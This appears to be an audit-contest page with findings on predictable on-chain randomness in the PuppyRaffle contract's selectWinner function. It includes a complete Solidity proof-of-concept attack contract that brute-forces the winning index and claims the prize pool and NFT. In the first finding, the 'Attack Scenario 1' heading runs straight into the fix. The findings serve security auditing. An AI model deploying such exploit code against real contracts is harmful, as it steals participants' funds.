The raffle should select a winner randomly and fairly, where each participant has an equal and unpredictable chance of winning based on their number of entries. The NFT rarity should also be randomly distributed according to the specified probabilities.
The PuppyRaffle::selectWinner() function uses on-chain data (msg.sender, block.timestamp, block.difficulty) to generate pseudo-random numbers for both winner selection and NFT rarity determination. These values are publicly known and predictable, allowing malicious actors to manipulate or predict the outcome.
Likelihood:
Reason 1: A sophisticated attacker (miner/validator) can manipulate block.difficulty/prevrandao directly. While this requires being a validator, the increasing accessibility of staking makes this more feasible over time.
Reason 2: Any participant can calculate all possible outcomes off-chain by iterating through different msg.sender addresses and only execute the transaction if they would win. This requires no special privileges - just computational power and multiple controlled addresses.
Reason 3: The function has no access control, allowing attackers to choose the optimal moment (specific block.timestamp) to call selectWinner() when conditions favor them.
Impact:
Impact 1: Complete subversion of fairness - The raffle becomes deterministic rather than random. Attackers can guarantee their own victory, making honest participants unable to win and destroying the protocol's core value proposition.
Impact 2: Economic exploitation - An attacker who can predict or influence the outcome can:
Enter the raffle with minimal entries only when they know they'll win
Win the 80% prize pool repeatedly
Mint only legendary NFTs (5% probability becomes 100%)
Front-run legitimate winners by timing their transaction strategically
Impact 3: Validator/MEV abuse - Block proposers can:
Reorder transactions to ensure their address calls selectWinner()
Manipulate prevrandao by choosing which block to propose
Extract value from the protocol systematically
Attack Scenario 1: Brute Force Winner Prediction
Implement Chainlink VRF v2 for truly verifiable randomness:
## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.
The contest is live. Earn rewards by submitting a finding.
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsThe contest is complete and the rewards are being distributed.